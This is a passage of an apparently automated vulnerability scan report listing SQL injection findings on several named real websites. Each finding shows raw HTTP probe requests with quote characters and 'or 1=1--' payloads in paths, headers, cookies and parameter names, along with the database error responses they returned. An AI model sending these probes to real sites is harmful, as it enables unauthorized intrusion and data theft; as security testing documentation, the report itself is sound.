Cookie: __utmz=118730462.1296942490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=118730462.1479561773.1296942490.1296942490.1296942490.1; __utmc=118730462; __utmb=118730462.1.10.1296942490;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Date: Sat, 05 Feb 2011 22:05:08 GMT
Content-Type: text/html
Connection: close
Content-Length: 0
Keep-Alive: timeout=15, max=500


1.28. http://www.freedownloadscenter.com/terms/team-calendar/calendar.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.freedownloadscenter.com
Path:   /terms/team-calendar/calendar.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /terms/team-calendar'/calendar.html HTTP/1.1
Host: www.freedownloadscenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118730462.1296942490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=118730462.1479561773.1296942490.1296942490.1296942490.1; __utmc=118730462; __utmb=118730462.1.10.1296942490;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Date: Sat, 05 Feb 2011 22:05:08 GMT
Content-Type: text/html
Connection: close
Content-Length: 376
Keep-Alive: timeout=15, max=500

<br />
<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/freedownloadscenter.com/htdocs/livehandler.php3</b> on line <b>21</b><br />
<br />
<b>Wa
...[SNIP]...

Request 2

GET /terms/team-calendar''/calendar.html HTTP/1.1
Host: www.freedownloadscenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118730462.1296942490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=118730462.1479561773.1296942490.1296942490.1296942490.1; __utmc=118730462; __utmb=118730462.1.10.1296942490;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Date: Sat, 05 Feb 2011 22:05:08 GMT
Content-Type: text/html
Connection: close
Content-Length: 0
Keep-Alive: timeout=15, max=500


1.29. http://www.freedownloadscenter.com/terms/team-calendar/calendar.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.freedownloadscenter.com
Path:   /terms/team-calendar/calendar.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /terms/team-calendar/calendar.html' HTTP/1.1
Host: www.freedownloadscenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118730462.1296942490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=118730462.1479561773.1296942490.1296942490.1296942490.1; __utmc=118730462; __utmb=118730462.1.10.1296942490;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Date: Sat, 05 Feb 2011 22:05:08 GMT
Content-Type: text/html
Connection: close
Content-Length: 376
Keep-Alive: timeout=15, max=500

<br />
<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/freedownloadscenter.com/htdocs/livehandler.php3</b> on line <b>21</b><br />
<br />
<b>Wa
...[SNIP]...

Request 2

GET /terms/team-calendar/calendar.html'' HTTP/1.1
Host: www.freedownloadscenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118730462.1296942490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=118730462.1479561773.1296942490.1296942490.1296942490.1; __utmc=118730462; __utmb=118730462.1.10.1296942490;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Date: Sat, 05 Feb 2011 22:05:09 GMT
Content-Type: text/html
Connection: close
Content-Length: 0
Keep-Alive: timeout=15, max=500


1.30. http://www.freedownloadscenter.com/terms/team-calendar/calendar.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.freedownloadscenter.com
Path:   /terms/team-calendar/calendar.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /terms/team-calendar/calendar.html?1'=1 HTTP/1.1
Host: www.freedownloadscenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118730462.1296942490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=118730462.1479561773.1296942490.1296942490.1296942490.1; __utmc=118730462; __utmb=118730462.1.10.1296942490;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Date: Sat, 05 Feb 2011 22:05:06 GMT
Content-Type: text/html
Connection: close
Content-Length: 376
Keep-Alive: timeout=15, max=500

<br />
<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/freedownloadscenter.com/htdocs/livehandler.php3</b> on line <b>21</b><br />
<br />
<b>Wa
...[SNIP]...

Request 2

GET /terms/team-calendar/calendar.html?1''=1 HTTP/1.1
Host: www.freedownloadscenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118730462.1296942490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=118730462.1479561773.1296942490.1296942490.1296942490.1; __utmc=118730462; __utmb=118730462.1.10.1296942490;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Date: Sat, 05 Feb 2011 22:05:06 GMT
Content-Type: text/html
Connection: close
Content-Length: 0
Keep-Alive: timeout=15, max=500


1.31. http://www.linkatopia.com/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.linkatopia.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET / HTTP/1.1
Host: www.linkatopia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:39:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=fgemhac8fj8cg4vu6sp9l0k041; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Content-Length: 21
Connection: close
Content-Type: text/html

Update referer failed

Request 2

GET / HTTP/1.1
Host: www.linkatopia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:39:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=aq32ki9rka3pck407dp563kg41; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 15274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Linka
...[SNIP]...

1.32. http://www.linkatopia.com/ [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.linkatopia.com
Path:   /

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET / HTTP/1.1
Host: www.linkatopia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:39:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=47l1f14gsf3aq2ifi25sve5r66; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Content-Length: 24
Connection: close
Content-Type: text/html

Update user agent failed

Request 2

GET / HTTP/1.1
Host: www.linkatopia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:39:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=q9ifci6l2j2tdrl3iv7clgbn71; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 15274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Linka
...[SNIP]...

1.33. http://www.linkatopia.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.linkatopia.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /?1'=1 HTTP/1.1
Host: www.linkatopia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:39:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=68dgcspto6ppv3i6dcpvk1gcl5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Content-Length: 24
Connection: close
Content-Type: text/html

Update page count failed

Request 2

GET /?1''=1 HTTP/1.1
Host: www.linkatopia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:39:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=ornsar14q490r54ghf8kqfk9n6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 15274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Linka
...[SNIP]...

1.34. http://www.linkfixerplus.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.linkfixerplus.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 16036492%20or%201%3d1--%20 and 16036492%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?116036492%20or%201%3d1--%20=1 HTTP/1.1
Host: www.linkfixerplus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 403 Forbidden
Date: Sun, 06 Feb 2011 17:23:02 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 506
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.linkfixerplus.com Port 80</address>
</body></html>

Request 2

GET /?116036492%20or%201%3d2--%20=1 HTTP/1.1
Host: www.linkfixerplus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 17:23:02 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 33322

<HTML><HEAD>
<link rel="alternate" type="application/rss+xml" title="RSS Feed for LinkTek.com" href="rss/rss.xml"
/>

<!-- AddThis.com Buttons Javascript -->
<script type="text/javascript">var addthis_pub="linktek";</script>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>

<TITLE>Fix broken links with LinkFixerPlus.</TITLE>
<meta name="verify-v1" content="BNstwDGv3/hYpx4cvJhG0OPgV5EN3GT+S3YtHTwQ6NQ=" />
<META NAME = "Description" CONTENT="LinkFixerPlus automatically reports, finds and fixes broken links when you move or rename files. Fix broken links in Microsoft, Word, Excel, Access, PowerPoint, AutoCAD, InDesign and HTML files.">
<META NAME = "Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META NAME = "Keywords" CONTENT="broken link, broken links, fix broken links, LinkFixerPlus, link fixer, microsoft, fix broken link, data migration, linktek, excel, microsoft office, word, powerpoint, access, autocad, indesign, html, document management, storage server, folder reorganization">
<META NAME="Author" CONTENT="LinkTek's LinkFixerPlus">
<META NAME="Robots" CONTENT="ALL">

<link rel="stylesheet" href="lfp-styles.css" type="text/css">

<SCRIPT type="text/javascript" src="menufunctions.js"></SCRIPT>
<SCRIPT type="text/javascript" src="mm_layerfunctions.js"></SCRIPT>
<SCRIPT type="text/javascript" src="menuitemshome.js"></SCRIPT>
<SCRIPT type="text/javascript" src="global.js"></SCRIPT>

</HEAD>

<BODY BGCOLOR=#FFFFFF LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0 link="#3366CC" OnUnload="submitForm();">
<form name="FORM_NAME" method="post">
<input type="hidden" name="cookies" value="" />
<input type="hidden" name="referer_string" value=""
...[SNIP]...

1.35. http://www.linuxsecurity.com/ads/adjs.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.linuxsecurity.com
Path:   /ads/adjs.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /ads'/adjs.php?n=424430122&what=zone:4&exclude=,&referer=http%3A//burp/show/23 HTTP/1.1
Host: www.linuxsecurity.com
Proxy-Connection: keep-alive
Referer: http://www.linuxsecurity.com/advisories/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 473097ac08cef5345a0ef7ef35a119cd=-

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:39:44 GMT
Server: Apache
X-Powered-By: PHP/4.4.7
Set-Cookie: 473097ac08cef5345a0ef7ef35a119cd=877aa9e56ef049011927f0bede7adce6; path=/
Set-Cookie: mosvisitor=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 22:39:45 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 61909

<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<a href="http://www.linuxsecurity.com/content/view/154306/">Ubuntu: 1058-1: PostgreSQL vulnerability</a>
...[SNIP]...

1.36. http://www.linuxsecurity.com/ads/adjs.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.linuxsecurity.com
Path:   /ads/adjs.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /ads/adjs.php'?n=424430122&what=zone:4&exclude=,&referer=http%3A//burp/show/23 HTTP/1.1
Host: www.linuxsecurity.com
Proxy-Connection: keep-alive
Referer: http://www.linuxsecurity.com/advisories/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 473097ac08cef5345a0ef7ef35a119cd=-

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:39:52 GMT
Server: Apache
X-Powered-By: PHP/4.4.7
Set-Cookie: 473097ac08cef5345a0ef7ef35a119cd=2ec72741552f32c77a2eb063a30c97bd; path=/
Set-Cookie: mosvisitor=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 22:39:53 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 61909

<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<a href="http://www.linuxsecurity.com/content/view/154306/">Ubuntu: 1058-1: PostgreSQL vulnerability</a>
...[SNIP]...

1.37. http://www.linuxsecurity.com/ads/adlog.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.linuxsecurity.com
Path:   /ads/adlog.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /ads'/adlog.php?bannerid=75&clientid=52&zoneid=4&source=&block=0&capping=0&cb=d44f13e3bc6b9e50f3529e3826e3166b HTTP/1.1
Host: www.linuxsecurity.com
Proxy-Connection: keep-alive
Referer: http://www.linuxsecurity.com/advisories/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 473097ac08cef5345a0ef7ef35a119cd=-

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:41:09 GMT
Server: Apache
X-Powered-By: PHP/4.4.7
Set-Cookie: 473097ac08cef5345a0ef7ef35a119cd=cf9cf38d4638ae0b950d8f0b1cec8309; path=/
Set-Cookie: mosvisitor=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 22:41:10 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 61909

<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<a href="http://www.linuxsecurity.com/content/view/154306/">Ubuntu: 1058-1: PostgreSQL vulnerability</a>
...[SNIP]...

1.38. http://www.linuxsecurity.com/ads/adlog.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.linuxsecurity.com
Path:   /ads/adlog.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /ads/adlog.php'?bannerid=75&clientid=52&zoneid=4&source=&block=0&capping=0&cb=d44f13e3bc6b9e50f3529e3826e3166b HTTP/1.1
Host: www.linuxsecurity.com
Proxy-Connection: keep-alive
Referer: http://www.linuxsecurity.com/advisories/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 473097ac08cef5345a0ef7ef35a119cd=-

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:41:18 GMT
Server: Apache
X-Powered-By: PHP/4.4.7
Set-Cookie: 473097ac08cef5345a0ef7ef35a119cd=90f2247981d79aaa6ef9cb5f3e34b1a8; path=/
Set-Cookie: mosvisitor=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 22:41:19 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 61909

<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<a href="http://www.linuxsecurity.com/content/view/154306/">Ubuntu: 1058-1: PostgreSQL vulnerability</a>
...[SNIP]...

1.39. http://www.linuxsecurity.com/advisories/ [473097ac08cef5345a0ef7ef35a119cd cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.linuxsecurity.com
Path:   /advisories/

Issue detail

The 473097ac08cef5345a0ef7ef35a119cd cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the 473097ac08cef5345a0ef7ef35a119cd cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /advisories/ HTTP/1.1
Host: www.linuxsecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 473097ac08cef5345a0ef7ef35a119cd=-'; __utmz=137231789.1296945319.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/23; __utma=137231789.34780583.1296945313.1296945313.1296945313.1; __utmc=137231789; __utmb=137231789.1.10.1296945313;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:57 GMT
Server: Apache
X-Powered-By: PHP/4.4.7
Set-Cookie: 473097ac08cef5345a0ef7ef35a119cd=a8f4bb5b5ebd8c70262e80f90ab7a88e; path=/
Set-Cookie: mosvisitor=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 23:02:58 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 49614

<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<a href="http://www.linuxsecurity.com/content/view/154306/">Ubuntu: 1058-1: PostgreSQL vulnerability</a>
...[SNIP]...

1.40. http://www.linuxsecurity.com/advisories/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.linuxsecurity.com
Path:   /advisories/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /advisories/ HTTP/1.1
Host: www.linuxsecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:06:59 GMT
Server: Apache
X-Powered-By: PHP/4.4.7
Set-Cookie: 473097ac08cef5345a0ef7ef35a119cd=-; path=/
Set-Cookie: mosvisitor=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 22:07:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 49614

<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<a href="http://www.linuxsecurity.com/content/view/154306/">Ubuntu: 1058-1: PostgreSQL vulnerability</a>
...[SNIP]...

1.41. http://www.linuxsecurity.com/advisories/ [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.linuxsecurity.com
Path:   /advisories/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the User-Agent HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /advisories/ HTTP/1.1
Host: www.linuxsecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:06:56 GMT
Server: Apache
X-Powered-By: PHP/4.4.7
Set-Cookie: 473097ac08cef5345a0ef7ef35a119cd=-; path=/
Set-Cookie: mosvisitor=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 22:06:57 GMT
Cache-Control: no-store, no-cache, must-revalidate
